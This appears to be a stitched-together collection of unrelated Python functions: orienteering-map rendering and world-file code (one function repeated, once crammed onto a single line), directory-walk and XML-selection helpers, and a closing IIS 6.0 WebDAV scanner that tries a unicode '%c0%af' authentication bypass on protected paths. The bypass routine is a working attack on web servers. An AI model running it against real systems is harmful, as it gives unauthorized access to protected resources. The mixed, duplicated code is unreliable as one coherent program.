    ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+0.004)*S2P)
    ctx.show_text(text)
    if style == "oterrain" or style == "streeto" or style == "streeto_norail":
        # Adornments - Attribution right line 1
        ctx = cairo.Context(surface)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_BOLD)
        ctx.set_source_rgb(1, 1, 1)
        ctx.set_font_size(9)
        text = "OpenOrienteeringMap was partially developed with a British Orienteering grant"
        width = ctx.text_extents(text)[4]
        ctx.translate((MAP_WM+MAP_W)*S2P-width, (MAP_NM+MAP_H+ADORN_ATTRIB_NM)*S2P)
        ctx.show_text(text)
        # Attribution right line 2
        ctx = cairo.Context(surface)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL)
        ctx.set_source_rgb(1, 1, 1)
        ctx.set_font_size(9)
        text = "Map ID: " + mapid
        width = ctx.text_extents(text)[4]
        ctx.translate((MAP_WM+MAP_W)*S2P-width, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+ADORN_ATTRIB_NM)*S2P)
        ctx.show_text(text)
    # Adornments - URL (the raw request string, in tiny text)
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
    ctx.set_font_size(0.5)
    text = path
    ctx.translate(MAP_WM*S2P, (MAP_NM+MAP_H+ADORN_URL_NM)*S2P)
    ctx.show_text(text)
    # Flatten the ARGB PNG onto a white background and save as JPEG.
    surface.write_to_png(file.name + '.png')
    im = Image.open(file.name + '.png')
    bg = Image.new("RGB", im.size, (255,255,255))
    bg.paste(im,im)
    bg.save(file.name, 'JPEG', quality=95)
    #bg.save(file.name, 'GIF')
    return file
def isforbidden(path):
    """Return True if *path* contains any entry of FORBIDDEN_DIR.

    The check is plain substring membership against the module-level
    FORBIDDEN_DIR sequence.
    """
    # `substring in path` is the idiomatic membership test; the original
    # `path.count(x) > 0` scans the whole string counting every match.
    return any(forbidden in path for forbidden in FORBIDDEN_DIR)
def createJPG(path):
    """Produce a six-line world file ('.jgw') for an OOM request string.

    Parses the pipe-delimited request, derives the paper extent in
    spherical-mercator metres, and returns a NamedTemporaryFile holding
    the world-file rows (x-step, 0, 0, y-step, west, north), rewound to
    the start. Malformed or oversized requests return an error string.

    NOTE(review): despite the name, this writes a world file, not a JPEG
    — it mirrors createJGW elsewhere in this file.
    """
    import tempfile

    # The margins are module-level and deliberately overwritten for the
    # "adhoc" style, so declare them global.
    global MAP_NM, MAP_EM, MAP_SM, MAP_WM

    # Basic shape validation of the pipe-delimited request string.
    if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 8:
        path += "|"
    (style, paper, scale, centre, title, club,
     mapid, start, crosses, controls) = path.split("|")

    # Each field is "key=value"; keep only the value part.
    style = style.split("=")[1]
    paper = paper.split("=")[1]
    paper_fields = paper.split(",")
    paper_w = float(paper_fields[0])
    paper_h = float(paper_fields[1])
    scale = int(scale.split("=")[1])
    centre = centre.split("=")[1]
    centre_fields = centre.split(",")
    clat = int(centre_fields[0])
    clon = int(centre_fields[1])

    # Correct the nominal scale for the mercator latitude stretch.
    merc = mapnik.Projection(EPSG900913)
    lat_wgs84 = mapnik.Coord(clon, clat).inverse(merc).y
    cos_lat = math.cos(lat_wgs84 * math.pi/180)
    metres_per_paper_unit = scale / cos_lat

    if style == "adhoc":
        # adhoc maps use the narrow west margin on all four sides.
        MAP_NM = MAP_EM = MAP_SM = MAP_WM
    map_w = paper_w - MAP_WM - MAP_EM
    map_h = paper_h - MAP_NM - MAP_SM

    # Paper corners in mercator metres, measured from the centre.
    south = clat - (map_h/2 + MAP_SM) * metres_per_paper_unit
    north = clat + (map_h/2 + MAP_NM) * metres_per_paper_unit
    west = clon - (map_w/2 + MAP_WM) * metres_per_paper_unit
    east = clon + (map_w/2 + MAP_EM) * metres_per_paper_unit

    # Refuse unreasonably large outputs (except for adhoc maps).
    if style != "adhoc":
        if paper_w * paper_h > 0.25:  # Roughly A2 size.
            return "Map too large. Try increasing the scale value or using a smaller paper size."
        if scale > 50000:
            return "Scale too small. Try using a lower scale value."

    pixel_w = paper_w * S2P
    pixel_h = paper_h * S2P

    # Emit the six world-file rows; y-step is negative (north-up image).
    world = tempfile.NamedTemporaryFile()
    for value in ((east - west) / pixel_w,
                  0,
                  0,
                  (south - north) / pixel_h,
                  west,
                  north):
        world.write(str(value) + "\n")
    world.seek(0)
    return world
def my_ismount(path):
    """Heuristic mount-point test based purely on slash count.

    Under '/media', only the root itself (zero slashes) or a direct
    child such as '/media/usb0' (two slashes) counts as a mount point;
    everywhere else anything at most one level deep does.
    """
    slashes = path.count('/')
    if not path.startswith('/media'):
        return slashes <= 1
    # '/media' alone (one slash) is not a mount; '/media/<dev>' is.
    return slashes in (0, 2)
def createJPG(path): import tempfile # Specifically declare these as global, as we may change them. global MAP_NM, MAP_EM, MAP_SM, MAP_WM if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 8: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split( "|") style = style.split("=")[1] paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi / 180) scaleCorrected = scale / scaleCorrectionFactor if style == "adhoc": MAP_EM = MAP_WM MAP_NM = MAP_WM MAP_SM = MAP_WM MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - MAP_NM - MAP_SM paperSLat = clat - (MAP_H / 2 + MAP_SM) * scaleCorrected paperNLat = clat + (MAP_H / 2 + MAP_NM) * scaleCorrected paperWLon = clon - (MAP_W / 2 + MAP_WM) * scaleCorrected paperELon = clon + (MAP_W / 2 + MAP_EM) * scaleCorrected # Limit the size of map we are prepared to produce if PAPER_W * PAPER_H > 0.25 and style != "adhoc": # Roughly A2 size. return "Map too large. Try increasing the scale value or using a smaller paper size." if scale > 50000 and style != "adhoc": return "Scale too small. Try using a lower scale value." PIXEL_W = PAPER_W * S2P PIXEL_H = PAPER_H * S2P #TODO Write lines to file here. fworld = tempfile.NamedTemporaryFile() #with open('temp.jgw', 'wb') as fworld: fworld.write(str((paperELon - paperWLon) / PIXEL_W) + "\n") fworld.write(str(0) + "\n") fworld.write(str(0) + "\n") fworld.write(str((paperSLat - paperNLat) / PIXEL_H) + "\n") fworld.write(str(paperWLon) + "\n") fworld.write(str(paperNLat) + "\n") fworld.seek(0) #return open('temp.jgw', 'rb') return fworld
def filter_walk(top, file_pattern=None, dir_pattern=None, depth=None, onerror=None, followlinks=False, onloop=None):
    """filter_walk is similar to os.walk, but offers the following
       additional features:
        - yields a named tuple of (path, subdirs, files, depth)
        - allows a recursion depth limit to be specified
        - allows independent glob-style filters for filenames and
          subdirectories
        - emits a message to stderr and skips the directory if a
          symlink loop is encountered when following links

       Selective walks are always top down, as the directory listings
       must be altered to provide the above features.

       If not None, depth must be at least 0. A depth of zero can be
       useful to get separate filtered subdirectory and file listings
       for a given directory.

       onerror is passed to os.walk to handle os.listdir errors
       followlinks is passed to os.walk and enables the symbolic loop
       detection

       onloop (if provided) can be used to override the default
       symbolic loop handling. It is called with the directory path as
       an argument when a loop is detected. Any false return value
       will skip the directory as normal, any true value means the
       directory will be processed.
    """
    if depth is not None and depth < 0:
        # Fix: depth == 0 is valid (see docstring), so the message must
        # say "at least 0" — the original said "greater than 0", which
        # contradicted both the check and the documented contract.
        msg = "Depth limit must be None or at least 0 ({!r} provided)"
        raise ValueError(msg.format(depth))
    if onloop is None:
        # Default loop handler: warn on stderr and skip the directory.
        def onloop(path):
            msg = "Symlink {!r} refers to a parent directory, skipping\n"
            sys.stderr.write(msg.format(path))
            sys.stderr.flush()
    if followlinks:
        real_top = os.path.abspath(os.path.realpath(top))
    sep = os.sep
    initial_depth = top.count(sep)
    for path, walk_subdirs, files in os.walk(top, topdown=True,
                                             onerror=onerror,
                                             followlinks=followlinks):
        # Check for symlink loops
        if followlinks and os.path.islink(path):
            # We just descended into a directory via a symbolic link
            # Check if we're referring to a directory that is
            # a parent of our nominal directory
            relative = os.path.relpath(path, top)
            nominal_path = os.path.join(real_top, relative)
            real_path = os.path.abspath(os.path.realpath(path))
            path_fragments = zip(nominal_path.split(sep), real_path.split(sep))
            for nominal, real in path_fragments:
                if nominal != real:
                    break
            else:
                # Every fragment matched: the link points at a parent.
                if not onloop(path):
                    walk_subdirs[:] = []
                    continue
        # Filter files, if requested
        if file_pattern is not None:
            files = fnmatch.filter(files, file_pattern)
        # We hide the underlying generator's subdirectory list, since we
        # clear it internally when we reach the depth limit (if any)
        if dir_pattern is None:
            subdirs = walk_subdirs[:]
        else:
            subdirs = fnmatch.filter(walk_subdirs, dir_pattern)
        # Report depth
        current_depth = path.count(sep) - initial_depth
        yield WalkedDir(path, subdirs, files, current_depth)
        # Filter directories and implement depth limiting
        if depth is not None and current_depth >= depth:
            walk_subdirs[:] = []
        else:
            walk_subdirs[:] = subdirs
def iterfind(self, path, namespaces=None, nsmap=None, ancestors=None):
    """
    Apply XPath selection to XML resource that yields full subtrees.

    :param path: an XPath expression to select element nodes.
    :param namespaces: an optional mapping from namespace prefixes to URIs \
    used for parsing the XPath expression.
    :param nsmap: provide a list/dict for tracking the namespaces of yielded \
    elements. If a list is passed the tracking is done at element level, otherwise \
    the tracking is on the whole tree, renaming prefixes in case of conflicts.
    :param ancestors: provide a list for tracking the ancestors of yielded elements.
    """
    if self._lazy:
        # Lazy (streaming) mode: iterparse the resource and only keep
        # the subtrees the (restricted) XPath selects.
        selector = LazySelector(path, namespaces)
        # Normalize the path before computing the subtree depth below.
        path = path.replace(' ', '').replace('./', '')
        resource = self.open()
        level = 0
        # True when the path is made only of '*' and '/' (select-all).
        select_all = '*' in path and set(path).issubset({'*', '/'})
        # Depth at which selected subtrees are rooted.
        if path == '.':
            subtree_level = 0
        elif path.startswith('/'):
            subtree_level = path.count('/') - 1
        else:
            subtree_level = path.count('/') + 1
        try:
            for event, node in self._lazy_iterparse(resource, nsmap):
                if event == "start":
                    # Track ancestors of the (future) yielded subtrees.
                    if ancestors is not None and level < subtree_level:
                        ancestors.append(node)
                    level += 1
                else:
                    level -= 1
                    if not level:
                        # Back at the document root.
                        if subtree_level:
                            pass
                        elif select_all or node in selector.select(self._root):
                            yield node
                    elif not subtree_level:
                        continue
                    elif level != subtree_level:
                        if ancestors is not None and level < subtree_level:
                            ancestors.pop()
                        continue  # pragma: no cover
                    elif select_all or node in selector.select(self._root):
                        yield node
                    # delete children, keep attributes, text and tail.
                    del node[:]
        finally:
            # Only close resources we opened ourselves.
            if self._source is not resource:
                resource.close()
    else:
        # Non-lazy mode: select over the fully-parsed tree.
        if ancestors is None:
            selector = iter_select
        else:
            # Wrap iter_select so the caller's `ancestors` list always
            # reflects the chain of parents of the yielded element.
            parent_map = self.parent_map
            ancestors.clear()

            def selector(*args, **kwargs):
                for e in iter_select(*args, **kwargs):
                    if e is self._root:
                        ancestors.clear()
                    else:
                        _ancestors = []
                        parent = e
                        try:
                            # Walk up until parent_map raises KeyError.
                            while True:
                                parent = parent_map[parent]
                                if parent is not None:
                                    _ancestors.append(parent)
                        except KeyError:
                            pass
                        if _ancestors:
                            ancestors.clear()
                            ancestors.extend(reversed(_ancestors))
                    yield e
        if not self._nsmap or nsmap is None:
            yield from selector(self._root, path, namespaces, strict=False)
        else:
            # Track namespace maps per yielded element, updating the
            # caller-provided nsmap only when the element's map changes.
            _nsmap = None
            for elem in selector(self._root, path, namespaces, strict=False):
                try:
                    if _nsmap is not self._nsmap[elem]:
                        _nsmap = self._nsmap[elem]
                        if isinstance(nsmap, list):
                            nsmap.clear()
                            nsmap.extend(_nsmap)
                        else:
                            for prefix, uri in _nsmap:
                                self._update_nsmap(nsmap, prefix, uri)
                except KeyError:
                    pass
                yield elem
def main():
    """Fingerprint an IIS/WebDAV target, log findings to *outfile*, and
    attempt the IIS 6.0 unicode ("%c0%af") auth bypass on any resources
    that return 401/502 to PROPFIND.

    Relies on module-level helpers: get_args, banner, fingerprinter,
    dav, auth_bypass, bcolors; plus requests, urlparse, base64, os, sys.
    NOTE(review): Python 2 code (dict.iteritems, b64encode on str).
    """
    sess = requests.Session()
    args = get_args()
    # Unpack CLI arguments.
    url = args.url
    auth = args.auth
    user = args.user
    pswd = args.password
    outfile = args.outfile
    dos = args.dos
    msf = args.msf
    proxy = args.proxy
    if proxy is not None:
        proxies = ({urlparse(args.proxy).scheme: args.proxy})
        sess.proxies = proxies
    unichar = "%c0%af"
    depth = args.depth
    # Disable certificate verification: targets commonly have bad certs.
    sess.verify = False
    banner()
    purl = urlparse(url)
    host = purl.netloc
    sess.headers = {'Host': purl.netloc, 'User-Agent': 'Mozilla/5.0 Windows NT 10.0; WOW64; rv:5.0) Gecko/20100101 Firefox/50.0' }
    # Append to an existing report, otherwise create it.
    if os.path.exists(outfile):
        o = open(outfile, "a")
    else:
        o = open(outfile, "w+")
    # Set the Basic auth header if credentials were supplied.
    if auth is not None:
        authstring = "%s:%s" % (user, pswd)
        encodedstring = base64.b64encode(authstring)
        sess.headers.update({'Authorization': 'Basic %s' % encodedstring})
    # Drop the plaintext credentials once encoded.
    user = None
    pswd = None
    f = fingerprinter.fingerprint(sess, purl, msf, dos)
    server = f.get('Server', "No Server Header")
    davEnabled = f.get('WebDAV', 'Unknown')
    # Clean up noise keys left by the fingerprinter.
    if 'Exploit Title' in f.keys():
        f.pop('Exploit Title')
    if '' in f.keys():
        f.pop('')
    directory = ""
    # The unicode auth bypass only applies to IIS 6.0 with WebDAV on.
    if server == "IIS/6.0" and davEnabled == "Enabled":
        dabp = True
    else:
        dabp = False
    with o as i:
        i.write(bcolors.HEADER + "[*]==================={Server Fingerprint}===================[*] \n" + bcolors.ENDC)
        i.write(bcolors.HEADER + "[*] Server: " + server + "\n" + bcolors.ENDC)
        i.write(bcolors.HEADER + "[*] WebDAV: " + davEnabled + "\n" + bcolors.ENDC)
        # Fix: the source had a redaction artifact ('"******"') here that
        # was a syntax error; the otherwise-unused dabp flag computed
        # above is evidently what was reported on this line.
        i.write(bcolors.HEADER + "[*] WebDAV Auth Bypass: " + str(dabp) + "\n" + bcolors.ENDC)
        i.write(bcolors.HEADER + "[*]==================={Exploit-DB Exploits}==================[*] \n" + bcolors.ENDC)
        for k, v in f.iteritems():
            # Fix: original used a bare `next` expression (a no-op that
            # merely references the builtin); `continue` is what's meant.
            if k == "Server" or k == "WebDAV":
                continue
            i.write(bcolors.OKGREEN + "[+]" + bcolors.ENDC + " %s ==> %s \n" % (k, v) )
        i.write(bcolors.HEADER + "[*]===================={~Server Mapping~}====================[*] \n" + bcolors.ENDC)
        if davEnabled == "Enabled":
            sess.headers.update({'Depth': depth, 'Content-Type': 'application/xml'})
            client = dav.Client()
            print("[*] First PROPFIND request may take a couple of minutes if the Depth header is infinity and a lot of data is returned.")
            r = client.propfind(sess, url)
            if r is None:
                i.write(bcolors.WARNING + "[-] PROPFIND REQUEST FAILED UNABLE TO CONTINUE" + bcolors.ENDC)
                print(bcolors.WARNING + "[-] PROPFIND request failed. Unable to continue" + bcolors.ENDC)
                sys.exit(1)
            # Walk every <response> in the multistatus body.
            for link in r[1].find_all('response'):
                if link.status is not None:
                    # e.g. "HTTP/1.1 200 OK" -> "OK"
                    stat = link.status.text.split(' ')[2].strip()
                    if stat == 'OK':
                        i.write(bcolors.OKGREEN + "[+] " + urlparse(link.href.text).path + " " + link.status.text + "\n" + bcolors.ENDC)
                    elif link.status.text == "HTTP/1.1 401 Unauthorized" or link.status.text == "HTTP/1.1 502 Bad Gateway":
                        i.write(bcolors.WARNING + "[-] " + link.href.text + " " + link.status.text + "\n" + bcolors.ENDC)
                        i.write(bcolors.WARNING + "[-] Unauthorized status returned, attempting auth bypass...\n" + bcolors.ENDC)
                        print(bcolors.WARNING + "[-] Unauthorized status returned, attempting auth bypass..." + bcolors.ENDC)
                        url = urlparse(link.href.text)
                        sess.headers.update({'Depth': '1'})
                        path = url.path
                        # Split the protected path into its first segment
                        # (p) and the remaining segments (q).
                        if path[-1:] == '/' and path[:1] == '/' and path.count('/') == 2:
                            p = path[1:][:-1]
                            q = ''
                        elif path.count('/') > 2:
                            q = path[1:][:-1].split('/')
                            p = q[0]
                        d = len(q)
                        if d != 0:
                            # Inject the overlong-UTF8 slash into the
                            # first segment, then re-append the rest.
                            u = url.scheme + "://" + url.netloc + "/" + p[:2] + "%c0%af" + p[2:]
                            if isinstance(q, list):
                                n = 1
                                while n != d:
                                    u = u + "/" + q[n]
                                    n = n + 1
                            #print("[*] DEBUG: " + u)
                            # Attempt PROPFIND if the URL is a folder,
                            # otherwise a plain GET.
                            if link.href.text[-1:] == "/":
                                resp = auth_bypass(sess, u, 'propfind', i, client)
                            else:
                                resp = auth_bypass(sess, u, 'get', i, client)
                            if not resp:
                                print(bcolors.FAIL + "[!] The server may be patched." + bcolors.ENDC)
                    else:
                        i.write(bcolors.WARNING + "[-] Unknown response status: %s " % str(stat) + "for: " + link.href.text + "\n" + bcolors.ENDC)
        else:
            print(bcolors.FAIL + "[!] WebDAV is not enabled" + bcolors.ENDC)
    # Redundant (the `with` block already closed it) but harmless.
    i.close()